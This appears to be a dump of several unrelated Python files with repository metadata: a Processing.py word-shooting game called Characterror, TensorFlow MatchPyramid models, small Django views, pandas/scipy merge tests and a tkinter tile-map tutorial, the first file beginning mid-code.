if self.tree.is_terminal(t.content):
t.active = False
if self.tree.is_word(t.content):
sounds['success'].play(0)
self.score_target(t)
T.addTween(self.targets[i], alpha=-255, textsize=16, tweenTime=1000,
onCompleteFunction=compl(t))
else:
sounds['failure'].play(0)
self.scorer.combobreak(t.x + len(t.content)*16, t.y)
T.addTween(self.targets[i], alpha=-255, textsize=16, tweenTime=1000,
onCompleteFunction=compl(t))
def remove_target(self, t):
assert t in self.targets, "couldn't find target!"
idx = self.targets.index(t)
self.add_target_at_slot(idx)
def remove_target_idx(self, idx):
self.add_target_at_slot(idx)
def score_target(self, target):
self.scorer.score_word(target.content, target.x + (len(target.content)*20),
target.y)
def populate_queue(self):
words = [t.content for t in self.targets]
suggested = list()
all_possible = list()
for word in words:
if self.tree.is_prefix(word):
word_possible = [x for x in self.tree.alts(word) if x != '$']
# fill queue with more letters to finish longer words
suggested += overdraw(word_possible, int(1.1*len(word)))
all_possible += word_possible
self.letterq.intersect(all_possible)
self.letterq.fill_rand_from(suggested)
def timer_done(self):
self.paused = True
sounds['etude2'].play(0)
for sp in self.letter_sprites:
T.removeTweeningFrom(sp)
self.manager.add_state(DisplayScoreState(self.scorer.score, self.mode))
class PauseHelpState(GameState):
def __init__(self, callback):
self.callback = callback
self.init_millis = millis()
def draw(self):
fill(0, 128)
rect(0, 0, width, height)
fill(255)
textAlign(CENTER)
textSize(64)
text("HELP", width/2, 64)
textAlign(LEFT)
textSize(16)
text("""
<UP>/<DN> select target
<Z> fire letter into target
<ENTER> detonate target
<X> shuffle letter magazine
Hit <ESC> again to quit to menu, or
any other key to return to the game.""", 32, 96)
def keyPressed(self):
# wait a second before registering keypresses
if millis() > self.init_millis + 1000:
if key == 27:
self.manager.remove_instances([PlayfieldState, ScoreState, TimerState,
ChallengeState])
titles = self.manager.get_instances([TitleScreenState])
assert len(titles) == 1, "wrong number of title screen states"
titles[0].fade_in()
else:
self.callback()
self.manager.remove_state(self)
class DisplayScoreState(GameState):
def __init__(self, score, mode):
self.score = score
self.mode = mode
def draw(self):
fill(0, 128)
rect(0, 0, width, height)
templ = \
"""
+---------------------------+
| FINAL SCORE |
| |
| |
| |
| <Esc> for menu |
| <C> to copy tweet w/score |
| to your clipboard |
+---------------------------+"""
textAlign(CENTER, CENTER)
textSize(16)
fill(255)
text(templ, width/2, height/2)
textSize(32)
text(str(self.score), width/2, height/2 - 16)
def keyPressed(self):
if key == 27:
self.manager.remove_instances([PlayfieldState, ScoreState, TimerState,
ChallengeState])
titles = self.manager.get_instances([TitleScreenState])
assert len(titles) == 1, "wrong number of title screen states"
titles[0].fade_in()
self.manager.remove_state(self)
elif key == ord('c'):
modestrs = {'90sec': 'in ninety seconds', '4min': 'in four minutes',
'challenge': 'with only 50 letters'}
modestr = modestrs.get(self.mode, '')
from hashlib import md5
shorthash = md5(str(self.score)+self.mode).hexdigest()[:6]
from java.awt.datatransfer import StringSelection
from java.awt import Toolkit
clipboard = Toolkit.getDefaultToolkit().getSystemClipboard()
clipboard.setContents(StringSelection("I just scored %d points %s on Characterror! http://characterror.com/?%s" % (self.score, modestr, shorthash)), None)
class StringSprite(object):
def __init__(self, content, x, y, textsize=16, r=255, g=255, b=255, a=255):
self.content = content
self.x = x
self.y = y
self.r = r
self.g = g
self.b = b
self.a = a
self.textsize = textsize
def draw(self):
textSize(self.textsize)
fill(self.r, self.g, self.b, self.a)
textAlign(CENTER)
text(self.content, self.x, self.y)
class ScoreState(GameState):
def __init__(self):
self.score = 0
self.multiplier = 10
self.score_sprites = list()
def score_letter(self, let, x, y):
letscore = 100 * self.multiplier
sprite = StringSprite(str(letscore), x, y, textsize=8)
T.addTween(sprite, y=-32, a=-255, tweenTime=1500, tweenType=T.OUT_EXPO,
onCompleteFunction=lambda: self.remove_sprite(sprite))
self.score_sprites.append(sprite)
self.score += letscore
self.multiplier += 1
def score_word(self, word, x, y):
wordscore = int(((len(word)*len(word))*0.5) * 1000)
wordscore = wordscore * self.multiplier
sprite = StringSprite(str(wordscore), textsize=8, x=x, y=y, r=0, g=255, b=0)
T.addTween(sprite, y=-32, g=0, a=-127, tweenTime=1000,
tweenType=T.OUT_EXPO,
onCompleteFunction=lambda: self.remove_sprite(sprite))
self.score_sprites.append(sprite)
self.score += wordscore
self.multiplier += 10
def combobreak(self, x, y):
if self.multiplier > 10:
self.multiplier = 10
sprite = StringSprite("BREAK", x, y, textsize=8,
r=255, g=0, b=0)
T.addTween(sprite, y=-32, a=-127, tweenTime=1000, tweenType=T.OUT_EXPO,
onCompleteFunction=lambda: self.remove_sprite(sprite))
self.score_sprites.append(sprite)
def attenuate_multiplier(self, amount):
self.multiplier = int(self.multiplier * amount)
def remove_sprite(self, sprite):
self.score_sprites.remove(sprite)
def draw(self):
for spr in self.score_sprites:
spr.draw()
fill(255)
textSize(16)
textAlign(LEFT)
text("SCORE: %012d" % self.score, 16, 16)
text("x%d" % self.multiplier, width-100, 16)
class ChallengeState(GameState):
def __init__(self, target_count, callback):
self.target_count = target_count
self.fire_count = 0
self.callback = callback
def fired(self, let):
self.fire_count += 1
if self.fire_count >= self.target_count:
self.callback()
def draw(self):
textSize(32)
textAlign(CENTER)
if self.fire_count > self.target_count * 0.9:
fill(255, 0, 0)
else:
fill(255)
text("%d / %d" % (self.fire_count, self.target_count), width/2, height-100)
class TimerState(GameState):
def __init__(self, seconds, callback):
self.seconds = seconds
self.callback = callback
self.called_callback = False
self.last_remaining = 0
def start(self):
self.started = millis()
def draw(self):
delta = millis() - self.started
delta_seconds = int(delta / 1000)
remaining = self.seconds - delta_seconds
# play tick if eight or fewer seconds left
if remaining != self.last_remaining and remaining <= 8 and remaining > 0:
sounds['tick'].play(0)
self.last_remaining = remaining
# red if only one eight of the time remains
textSize(32)
textAlign(CENTER)
if remaining <= self.seconds / 8:
fill(255, 0, 0)
else:
fill(255)
# call callback if time's up
if remaining <= 0:
remaining = 0
if self.called_callback is False:
self.called_callback = True
self.callback()
minutes = remaining / 60
second_remainder = remaining % 60
text("%d:%02d" % (minutes, second_remainder), width/2, height - 100)
class StarFieldState(GameState):
def __init__(self, layer_count=3, star_count=100):
self.layers = list()
self.layer_count = layer_count
for i in range(layer_count):
field = [(random.randrange(width),random.randrange(height)) for i \
in range(star_count)]
self.layers.append(field)
def draw(self):
textSize(8)
for i, layer in enumerate(self.layers):
for x, y in layer:
fill((i + 1) * (255.0 / self.layer_count))
xoff = (millis() / 25.0) * (i + 1)
text(".", (x + xoff) % width, y)
def loadtree(callback):
tree = LetterTree()
for line in open('wordlist_short'):
line = line.strip()
tree.feed(line + "$")
callback(tree)
class TitleScreenState(GameState):
def __init__(self):
self.title = "CHARACTERROR"
self.alpha = 255
self.colors = [(64, 192, 0), (96, 224, 32), (128, 255, 64),
(160, 0, 96), (192, 32, 128), (224, 64, 160),
(255, 96, 192), (0, 128, 224), (32, 160, 255)]
self.thread = None
self.init_loading_threads()
self.fading = False
self.menu = [
('instructions', 'How to play', 'Story and tutorial'),
('90sec','Timed game: 90 seconds','Get the highest score in ninety seconds!'),
('4min','Timed game: 4 minutes','You have four minutes. How high can you score?'),
('challenge','50 letter challenge', "The timer's off. How many points can you score with just 50 letters?"),
('credits', 'Credits', "Who made this game?")]
self.selected = 0
def init_loading_threads(self):
# just running one thread to load resources for now
self.thread = Thread(target=loadtree, args=(self.tree_load_done,))
self.thread.start()
def tree_load_done(self, tree):
self.tree = tree
def draw(self):
# draw banner
textSize(48)
textAlign(LEFT)
xcenter = width / 2.0
ypos = height / 3.0
xstart = xcenter - (textWidth(self.title) / 2.0)
pushMatrix()
translate(xstart, ypos)
idx = (frameCount / 32) % 9
this_col = self.colors[idx:] + self.colors[:idx]
for i, ch in enumerate(self.title):
i = i % len(self.colors)
fill(this_col[i][0], this_col[i][1], this_col[i][2], self.alpha)
text(ch, 0, 0)
translate(48, 0)
popMatrix()
# loading or menu
textAlign(CENTER)
fill(255, 255, 0, self.alpha)
textSize(16)
if self.thread.isAlive():
num = (frameCount / 9) % 4
ch = '|/-\\'
text("LOADING " + ch[num], xcenter, 2 * height / 3.0)
else:
for i, (short, content, desc) in enumerate(self.menu):
if self.selected == i:
textSize(8)
fill(255, self.alpha)
text(desc, xcenter, height - 96)
else:
fill(192, self.alpha)
textSize(16)
text(content, xcenter, (2*(width/5)) + (i*24))
textSize(8)
fill(255, 255, 0, self.alpha)
text("Choose option with UP and DOWN. Press <Z> to select.", xcenter, (height - 48))
def keyPressed(self):
if self.thread.isAlive():
return
if self.fading:
return
if key == ord('i') or (key == CODED and keyCode == UP):
self.selected -= 1
elif key == ord('k') or (key == CODED and keyCode == DOWN):
self.selected += 1
self.selected = self.selected % len(self.menu)
elif key == ord('z'):
self.fading = True
selected_option = self.menu[self.selected][0]
T.addTween(self, alpha=-255, tweenTime=1000, tweenType=T.OUT_EXPO,
onCompleteFunction=lambda: self.faded_out(selected_option))
def faded_out(self, opt):
# when fadeout completes, this is called
self.manager.mute(self)
if opt in ('90sec', '4min', 'challenge'):
if opt == '90sec':
remaining_time = 90
elif opt == '4min':
remaining_time = 240
scorer = ScoreState()
sketch.add_state(scorer)
playfield = PlayfieldState(self.tree, scorer, opt)
if opt == 'challenge':
challenge = ChallengeState(50, lambda: playfield.timer_done())
sketch.add_state(challenge)
playfield.add_fire_listener(challenge)
else:
timer = TimerState(remaining_time, lambda: playfield.timer_done())
sketch.add_state(timer)
timer.start()
sketch.add_state(playfield)
sounds['etude1'].play(0)
elif opt == 'instructions':
sketch.add_state(InstructionsState(self, self.tree))
elif opt == 'credits':
sketch.add_state(CreditsState(self))
def fade_in(self):
self.manager.unmute(self)
T.addTween(self, alpha=255, tweenTime=1000, tweenType=T.OUT_EXPO,
onCompleteFunction=self.faded_in)
def faded_in(self):
self.fading = False
class InstructionsState(GameState):
def __init__(self, title_screen, tree):
self.title_screen = title_screen
self.page = 0
self.tree = tree
self.init_demo()
def init_demo(self):
self.letterq = LetterQueue(5, play_offset_x + fighter_offset_x + 96,
play_offset_y)
for ch in 'cram':
self.letterq.append(ch)
self.fighter = Fighter(self.letterq, 1, 0)
self.target = TargetString('s', self.tree, play_offset_x, play_offset_y)
self.letter_sprites = list()
def draw(self):
if self.page == 0:
fill(255)
textAlign(CENTER)
textSize(64)
text("THE STORY", width/2, 64)
textAlign(LEFT)
textSize(16)
text("""
You are CAPTAIN S. PELLER,
starfighter pilot extraordinaire.
Your mission: defeat the CHARAC-
TERRORS, evil space aliens bent on
galactic dominance. Their only
weakness: a CHARACTERROR will
subsume any letter fired into it.
CHARACTERRORS forming English words
can be detonated and thus destroyed.
""", 32, 96)
pushMatrix()
translate(0, 232)
self.letterq.draw()
self.fighter.draw()
self.target.draw()
for sp in self.letter_sprites:
sp.draw()
popMatrix()
textAlign(CENTER)
textSize(16)
fill(255)
text("Hit <Z> to fire letters, then\n<ENTER> when the word is green!",
width/2, 390)
elif self.page == 1:
fill(255)
textAlign(CENTER)
textSize(64)
text("CONTROLS", width/2, 64)
textAlign(LEFT)
textSize(16)
text("""
<UP>/<DN> select target
<Z> fire letter into target
<ENTER> detonate target
<X> shuffle letter magazine
<ESC> help/quit
Words must be between three and ten
letters long. This game uses the
SOWPODS dictionary.
WARNING: Detonating a target that is
not green will reset your score
multiplier. Shuffling your magazine
may help you get at the letter you
want, but will cut your multiplier
in half.
""", 32, 96)
textAlign(CENTER)
text("Hit <Z> to continue.", width/2, 450)
elif self.page == 2:
fill(255)
textAlign(CENTER)
textSize(48)
text("HINTS & TIPS", width/2, 64)
textAlign(LEFT)
textSize(16)
text("""
* Longer words earn more points!
* Your score multiplier increases
for every letter landed, and for
every valid word detonated.
* If a target contains a string that
could never begin a valid English
word, the target is destroyed and
your score multiplier reset.
* Your magazine will always *only*
contain letters that can combine
with targets to begin valid English
words. Exercise your vocabulary!
* Words that can't be extended to
form longer words will be detonated
automatically.
""", 32, 96)
textAlign(CENTER)
text("Hit <Z> to continue.", width/2, 450)
def fire(self):
if not(self.target.active):
return
self.target.active = False
sounds['shoot'].play(0)
popped = self.letterq.pop()
sprite = LetterSprite(popped, self.fighter.x, self.fighter.y)
destx = play_offset_x + (len(self.target.content) * 16)
desty = play_offset_y + (self.fighter.pos * 40)
destpos = self.fighter.pos
T.addTween(sprite, x=(destx-self.fighter.x), y=(desty-self.fighter.y),
tweenTime=400, tweenType=T.OUT_EXPO,
onCompleteFunction=lambda: self.letter_arrived(sprite, destpos))
self.letter_sprites.append(sprite)
def letter_arrived(self, sprite, pos):
self.letter_sprites.remove(sprite)
self.target.subsume(sprite.let)
self.target.active = True
def advance_page(self):
self.page += 1
def keyPressed(self):
if self.page == 0:
if key == ord('z') and self.target.content != "scram":
self.fire()
if key == ord('\n') and self.target.content == "scram":
sounds['success'].play(0)
T.addTween(self.target, alpha=-255, textsize=16, tweenTime=1000,
onCompleteFunction=lambda: self.advance_page())
elif self.page == 1:
if key == ord('z'):
self.page = 2
elif self.page == 2:
if key == ord('z'):
self.title_screen.fade_in()
self.manager.remove_state(self)
class CreditsState(GameState):
def __init__(self, title_screen):
self.title_screen = title_screen
def draw(self):
fill(255)
textAlign(CENTER)
textSize(64)
text("CREDITS", width/2, 64)
textAlign(LEFT)
textSize(16)
text("""
Game by Adam Parrish
decontextualize.com
Made for Experimental Gameplay
Project's February 2011 competition
experimentalgameplay.com
(Yes, the stars are ASCII 0x2E)
Programmed with processing.py
github.com/jdf/processing.py
Thanks to Ben Harling for the Python
port of Tweener!
""", 32, 96)
textAlign(CENTER)
text("Hit <Z> to continue.", width/2, 450)
def keyPressed(self):
if key == ord('z'):
self.title_screen.fade_in()
self.manager.remove_state(self)
class Sketch(GameStateManager):
def setup(self):
frameRate(30)
size(640, 480)
fill(0)
background(0)
font = createFont("pcsenior.ttf", 16)
textFont(font)
sketch.add_state(StarFieldState())
sketch.add_state(TitleScreenState())
self.s = millis()
def draw(self):
background(0)
tm = float(millis())
delta = tm - self.s
self.s = tm
T.update(delta)
super(Sketch, self).draw()
T = Tweener()
sketch = Sketch()
minim = None
sounds = dict()
def setup():
global minim
sketch.setup()
minim = Minim(this)
sounds['shoot'] = minim.loadSnippet("shoot.wav")
sounds['discard'] = minim.loadSnippet("discard.wav")
sounds['failure'] = minim.loadSnippet("failure.wav")
sounds['success'] = minim.loadSnippet("success.wav")
sounds['etude1'] = minim.loadSnippet("etude1.wav")
sounds['etude2'] = minim.loadSnippet("etude2.wav")
sounds['tick'] = minim.loadSnippet("tick.wav")
def draw():
sketch.draw()
def mouseClicked():
sketch.mouseClicked()
def keyPressed():
if key == 27:
this.key = '\0'
sketch.keyPressed()
def stop():
for snip in sounds.vales():
snip.close()
minim.stop()
| true
|
d5452f3967c5522801229bfa010d2f84f9f57391
|
Python
|
luozhouyang/matchpyramid
|
/mp/models.py
|
UTF-8
| 5,810
| 2.609375
| 3
|
[
"Apache-2.0"
] |
permissive
|
# Copyright 2019 luozhouyang
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from mp.indicator import Indicator
model_config = {
'query_max_len': 1000,
'doc_max_len': 1000,
'num_conv_layers': 3,
'filters': [8, 16, 32],
'kernel_size': [[5, 5], [3, 3], [3, 3]],
'pool_size': [[2, 2], [2, 2], [2, 2]],
'dropout': 0.5,
'batch_size': 32,
'vocab_size': 100, # Important!!! update vocab_size
'embedding_size': 128,
}
def build_dot_model(config):
"""Using dot-product to produce match matrix, as described in the paper."""
q_input = tf.keras.layers.Input(shape=(config['query_max_len'],), name='q_input')
d_input = tf.keras.layers.Input(shape=(config['doc_max_len'],), name='d_input')
embedding = tf.keras.layers.Embedding(config['vocab_size'], config['embedding_size'], name='embedding')
q_embedding = embedding(q_input)
d_embedding = embedding(d_input)
# dot
dot = tf.keras.layers.Dot(axes=-1, name='dot')([q_embedding, d_embedding])
# reshape to [batch_size, query_max_len, doc_max_len, channel(1)]
matrix = tf.keras.layers.Reshape((config['query_max_len'], config['doc_max_len'], 1), name='matrix')(dot)
x = matrix
for i in range(config['num_conv_layers']):
x = tf.keras.layers.Conv2D(
filters=config['filters'][i],
kernel_size=config['kernel_size'][i],
padding='same',
activation='relu',
name='conv_%d' % i)(x)
x = tf.keras.layers.MaxPooling2D(pool_size=tuple(config['pool_size'][i]), name='max_pooling_%d' % i)(x)
x = tf.keras.layers.BatchNormalization()(x)
flatten = tf.keras.layers.Flatten()(x)
dense = tf.keras.layers.Dense(32, activation='relu')(flatten)
out = tf.keras.layers.Dense(1, activation='sigmoid', name='out')(dense)
model = tf.keras.Model(inputs=[q_input, d_input], outputs=[matrix, out])
model.compile(
loss={
'out': 'binary_crossentropy'
},
optimizer='sgd',
metrics={
'out': [tf.keras.metrics.Accuracy(), tf.keras.metrics.Recall(), tf.keras.metrics.Precision()]
})
return model
def build_cosine_model(config):
"""Using cosine to produce match matrix, as described in the paper."""
q_input = tf.keras.layers.Input(shape=(config['query_max_len'],), name='q_input')
d_input = tf.keras.layers.Input(shape=(config['doc_max_len'],), name='d_input')
embedding = tf.keras.layers.Embedding(config['vocab_size'], config['embedding_size'], name='embedding')
q_embedding = embedding(q_input)
d_embedding = embedding(d_input)
# cosine
cosine = tf.keras.layers.Dot(axes=-1, normalize=True, name='cosine')([q_embedding, d_embedding])
matrix = tf.keras.layers.Reshape((config['query_max_len'], config['doc_max_len'], 1), name='matrix')(cosine)
x = matrix
for i in range(config['num_conv_layers']):
x = tf.keras.layers.Conv2D(
filters=config['filters'][i],
kernel_size=config['kernel_size'][i],
padding='same',
activation='relu',
name='conv_%d' % i)(x)
x = tf.keras.layers.MaxPooling2D(pool_size=tuple(config['pool_size'][i]), name='max_pooling_%d' % i)(x)
x = tf.keras.layers.BatchNormalization()(x)
flatten = tf.keras.layers.Flatten()(x)
dense = tf.keras.layers.Dense(32, activation='relu')(flatten)
out = tf.keras.layers.Dense(1, activation='sigmoid', name='out')(dense)
model = tf.keras.Model(inputs=[q_input, d_input], outputs=[matrix, out])
model.compile(
loss={
'out': 'binary_crossentropy'
},
optimizer='sgd',
metrics={
'out': [tf.keras.metrics.Accuracy(), tf.keras.metrics.Recall(), tf.keras.metrics.Precision()]
})
return model
def build_indicator_model(config):
"""Using indicator fn to produce match matrix, as described in the paper."""
q_input = tf.keras.layers.Input(shape=(config['query_max_len'],), name='q_input')
d_input = tf.keras.layers.Input(shape=(config['doc_max_len'],), name='d_input')
m = Indicator(config['query_max_len'], config['doc_max_len'], name='matrix')((q_input, d_input))
m2 = tf.keras.layers.Reshape((config['query_max_len'], config['doc_max_len'], 1), name='m2')(m)
x = m2
for i in range(config['num_conv_layers']):
x = tf.keras.layers.Conv2D(
filters=config['filters'][i],
kernel_size=config['kernel_size'][i],
padding='same',
activation='relu',
name='conv_%d' % i)(x)
x = tf.keras.layers.MaxPooling2D(pool_size=tuple(config['pool_size'][i]), name='max_pooling_%d' % i)(x)
x = tf.keras.layers.BatchNormalization()(x)
flatten = tf.keras.layers.Flatten()(x)
dense = tf.keras.layers.Dense(32, activation='relu')(flatten)
out = tf.keras.layers.Dense(1, activation='sigmoid', name='out')(dense)
model = tf.keras.Model(inputs=[q_input, d_input], outputs=[out, m])
model.compile(
loss={
'out': 'binary_crossentropy'
},
optimizer='sgd',
metrics={
'out': [tf.keras.metrics.Accuracy(), tf.keras.metrics.Recall(), tf.keras.metrics.Precision()]
})
return model
| true
|
9d824c85ed90c2972c8936e67d1e6365b7f7775e
|
Python
|
stevie-h/19.7.2021
|
/math_utils.py
|
UTF-8
| 300
| 3.515625
| 4
|
[] |
no_license
|
# ex23
def compare(x, y):
if x > y:
return x
elif y > x:
return y
else:
raise Exception("Numbers are equal")
def three_multiple(x):
if x % 3 == 0:
return True
else:
return False
def power(a, n):
return a ** n
| true
|
f0059d3fc99cbdbbef11373b865b9772a69f0c53
|
Python
|
Akhilchowdary97/p3
|
/p3/views.py
|
UTF-8
| 1,672
| 2.953125
| 3
|
[] |
no_license
|
from django.http import HttpResponse
from django.shortcuts import render
def index(request):
return HttpResponse("<marquee>Hello ,Welcome To p3 Project</marquee>")
def home(request):
return render(request,"simple.html")
def second(request):
return render(request,"directory/second.html")
def third(request):
return render(request,"directory/third.html",context={'data':"Akki",'name':"Akhil Chowdary Maguluri"})
def fourth(request):
fruits=['apple','mango','banana','kiwi','orange']
return render(request,"directory/fourth.html",{'fruits':fruits})
def fifth(request):
return render(request,"directory/fifth.html",{'a':10,'b':17})
def urls_data(request,name):
return HttpResponse("<h1>{}</h1>".format(name))
def ab(request,a,b):
sum=int(a)+int(b)
return HttpResponse(str(sum))
def ac(request,c,d):
if int (c) > int (d):
greatest = " c Value is Greatest", c
elif int(d) > int(c):
greatest = " d Value is Greatest", d
else:
greatest = " Two Values are equal ",c,d
context = {"greatest":greatest}
return render(request,"directory/greatest.html",context)
def ad(request,e,f,g):
if int (e) > int (f) and int (e) > int (g):
greatest = " e Value is Greatest", e
elif int (f) > int (e) and int (f) > int (g):
greatest = " f Value is Greatest", f
elif int(g) > int (f) and int (g) > int (e):
greatest = " g Value is Greatest", g
elif e == f and f == g and g == e:
greatest = " Three Values are Equal",e,f,g
else:
greatest = "Two Values are equal"
context = {"greatest":greatest}
return render(request,"directory/greatest1.html",context)
| true
|
ad0b0f4611fd6f19452b1e7cb010dfb6e4dcf5ed
|
Python
|
rwolst/pandas-merge-product-sum
|
/merge_product_sum/tests/test_mps.py
|
UTF-8
| 7,121
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
import pytest
import pandas as pd
import numpy as np
import scipy as sp
import scipy.sparse
from merge_product_sum.mps import (merge_product_sum, to_sparse,
multiply_sparse, reverse_index_map)
@pytest.fixture()
def df1():
df = pd.DataFrame([
[20160404, 'John', 'Z_0', 0.3],
[20160404, 'John', 'Z_1', 0.2],
[20160404, 'John', 'Z_4', 0.5],
[20160404, 'Toby', 'Z_0', 0.4],
[20160404, 'Toby', 'Z_1', 0.6],
[20160404, 'Toby', 'Z_4', 0.0],
[20160407, 'John', 'Z_0', 0.1],
[20160407, 'John', 'Z_1', 0.5],
[20160407, 'John', 'Z_4', 0.4]
], columns = ['DATE', 'NAME', 'Z', 'PROB'])
# Assert group by each (DATE, NAME) and summing is 1.
return df
@pytest.fixture()
def df_large():
"""Create a large random dataframe for testing."""
# Sample the discrete sets of values (just so they are not np.arange).
N = 1000
n_date = 100
n_name = 100
n_country = 100
n_team = 100
n_z = 4
DATE_set = np.random.choice(N, n_date, replace=False)
NAME_set = np.random.choice(N, n_name, replace=False)
COUNTRY_set = np.random.choice(N, n_country, replace=False)
TEAM_set = np.random.choice(N, n_team, replace=False)
Z_set = np.random.choice(N, n_z, replace=False)
# Sample the actual values and create the dataframe.
N_1 = 3000
DATES = np.random.choice(DATE_set, N_1, replace=True)[:,None]
NAMES = np.random.choice(NAME_set, N_1, replace=True)[:,None]
Z_1 = np.random.choice(Z_set, N_1, replace=True)[:,None]
df1 = pd.DataFrame(np.concatenate((DATES, NAMES, Z_1), 1),
columns=['DATE', 'NAME', 'Z'])
## Create random probs (don't worry about summing to certain values).
df1['PROB'] = np.random.rand(len(df1))
N_2 = 10
COUNTRIES = np.random.choice(COUNTRY_set, N_2, replace=True)[:,None]
TEAMS = np.random.choice(TEAM_set, N_2, replace=True)[:,None]
Z_2 = np.random.choice(Z_set, N_2, replace=True)[:,None]
df2 = pd.DataFrame(np.concatenate((COUNTRIES, TEAMS, Z_2), 1),
columns=['COUNTRY', 'TEAM', 'Z'])
df2['PROB'] = np.random.rand(len(df2))
return df1, df2
@pytest.fixture()
def df1_sparse():
"""Sparse representation of df1."""
# Alphabetically:
# [20160404, 20160407]
# ['John', 'Toby']
rows = [0, 0, 0, 2, 2, 2, 1, 1, 1]
cols = [0, 1, 2, 0, 1, 2, 0, 1, 2]
values = [0.3, 0.2, 0.5, 0.4, 0.6, 0.0, 0.1, 0.5, 0.4]
m = sp.sparse.coo_matrix((values, (rows, cols)), shape=[4,3])
return m
@pytest.fixture()
def df2():
df = pd.DataFrame([
['England', 'Warriors', 'Z_0', 0.4],
['England', 'Warriors', 'Z_1', 0.1],
['England', 'Warriors', 'Z_4', 0.4],
['Scotland', 'Spartans', 'Z_0', 0.6],
['Scotland', 'Spartans', 'Z_1', 0.9],
['Scotland', 'Spartans', 'Z_4', 0.6],
], columns = ['COUNTRY', 'TEAM', 'Z', 'PROB'])
# Assert group by each Z and summing is 1.
return df
@pytest.fixture()
def df2_sparse():
"""Sparse representation of df2."""
# Alphabetically:
# ['England', 'Scotland']
# ['Spartans', 'Warriors']
rows = [2, 2, 2, 1, 1, 1]
cols = [0, 1, 2, 0, 1, 2]
values = [0.4, 0.1, 0.4, 0.6, 0.9, 0.6]
m = sp.sparse.coo_matrix((values, (rows, cols)), shape=[4,3])
return m
@pytest.fixture()
def df():
"""The true merge product sum value."""
df = pd.DataFrame([
[20160404, 'John', 'England', 'Warriors', 0.34],
[20160404, 'Toby', 'England', 'Warriors', 0.22],
[20160407, 'John', 'England', 'Warriors', 0.25],
[20160404, 'John', 'Scotland', 'Spartans', 0.66],
[20160404, 'Toby', 'Scotland', 'Spartans', 0.78],
[20160407, 'John', 'Scotland', 'Spartans', 0.75],
], columns = ['DATE', 'NAME', 'COUNTRY', 'TEAM',
'PROB'])
return df
@pytest.fixture()
def df_sparse():
"""Sparse representation of df where rows are (DATE, NAME) and columns
are (COUNTRY, TEAM)."""
rows = [0, 2, 1, 0, 2, 1]
cols = [2, 2, 2, 1, 1, 1]
values = [0.34, 0.22, 0.25, 0.66, 0.78, 0.75]
n_rows = 4
n_cols = 4
m = sp.sparse.coo_matrix((values, (rows, cols)), shape=[n_rows, n_cols])
return m
def merge_product_sum_pandas(df1, df2):
df = pd.merge(df1, df2, on=['Z'])
df['PROB'] = df['PROB_x']*df['PROB_y']
df.drop(['PROB_x', 'PROB_y'], axis=1, inplace=True)
df = df.groupby(['DATE', 'NAME', 'COUNTRY', 'TEAM']).sum()
df = df.reset_index()
return df
def test_reverse_index_map(df1, df2, df, df_sparse):
"""Test reverse index on all our sparse matrices."""
df1_reversed = reverse_index_map(df_sparse.row,
df1.set_index(['DATE', 'NAME', 'Z']).index)
df2_reversed = reverse_index_map(df_sparse.col,
df2.set_index(['COUNTRY', 'TEAM', 'Z']).index)
assert (df[['NAME', 'DATE']] == df1_reversed).all().all()
assert (df[['TEAM', 'COUNTRY']] == df2_reversed).all().all()
def test_to_sparse(df1, df1_sparse, df2, df2_sparse):
"""Test the to_sparse function."""
idx1 = ['DATE', 'NAME']
idx2 = ['COUNTRY', 'TEAM']
m1 = to_sparse(df1.set_index(idx1 + ['Z']), idx1, ['PROB'])
m2 = to_sparse(df2.set_index(idx2 + ['Z']), idx2, ['PROB'])
assert (m1 != df1_sparse).size == 0
assert (m2 != df2_sparse).size == 0
def test_multiply_sparse(df1_sparse, df2_sparse, df_sparse):
m = multiply_sparse(df1_sparse, df2_sparse)
# Numerical error make it hard to use != and ==
assert ((m.todense() - df_sparse.todense())**2 < 1e-7).all()
def extract_prob(df):
"""Orders and extracts probability from dataframe for testing."""
col_idx = ['DATE', 'NAME', 'COUNTRY', 'TEAM']
out = df.sort_values(col_idx).reset_index(drop=True)['PROB']
return out
def test_merge_product_sum(df1, df2, df):
mps = merge_product_sum(df1, df2, on=['Z'], lindex=['DATE', 'NAME'],
rindex=['COUNTRY', 'TEAM'], lval=['PROB'],
rval=['PROB'])
mps_pandas = merge_product_sum_pandas(df1, df2)
assert ((extract_prob(mps) - extract_prob(df))**2 < 1e-7).all().all()
assert ((extract_prob(mps) - extract_prob(mps_pandas))**2 < 1e-7).all().all()
def test_merge_product_sum_large(df_large):
df1, df2 = df_large
mps = merge_product_sum(df1, df2, on=['Z'], lindex=['DATE', 'NAME'],
rindex=['COUNTRY', 'TEAM'], lval=['PROB'],
rval=['PROB'])
mps_pandas = merge_product_sum_pandas(df1, df2)
assert ((extract_prob(mps) - extract_prob(mps_pandas))**2 < 1e-7).all().all()
| true
|
aafc71816f029dfcd91adbcfd725ea8f8bce19c5
|
Python
|
veltadestiana/Data-Structure
|
/Tutorial 1/Tutorial 1 Solution/Tutorial1.py
|
UTF-8
| 1,616
| 3.78125
| 4
|
[] |
no_license
|
"""Tutorial 1"""
# Name: [fill in your name here]
# NPM: [fill in you NPM here]
from tkinter import *
def loadMap(filename):
# Loads .map file, filters numbers only and returns a 2D array
# [TO DO]
rawfile = open(filename)
file = (rawfile.read())
file = list(filter(lambda x: x.isdigit(), file))
array = [] # array is now 1D list of numbers
for i in range(30):
# converts 1D array to 30x30 2D array
array.append(file[:30])
file = file[30:]
rawfile.close()
return array
def renderMap(mapfile):
# Accepts 2D array, creates a tkinter GUI and canvas, reads the array
# then renders a 600x600 graphic gamespace according to the array's
# values.
# [TO DO]
r = Tk()
r.title("Tutorial 1")
c = Canvas(r, width=600, height=600)
c.pack()
# Image dictionary for holding PhotoImage instances of .gif
# Available directories: ./sprite, ./sprite/emoji
imgdict = {'0':PhotoImage(file = './sprite/emoji/0.gif'),
'1':PhotoImage(file = './sprite/emoji/1.gif'),
'2':PhotoImage(file = './sprite/emoji/2.gif'),
'3':PhotoImage(file = './sprite/emoji/3.gif'),
'4':PhotoImage(file = './sprite/emoji/4.gif')}
y = 0
for line in mapfile:# iterates by row
x = 0
for i in line: # iterates by column
# array value provides index for image dict
c.create_image(15+x*20,15+y*20,image=imgdict[i])
x += 1
y+=1
r.mainloop()
# Main program
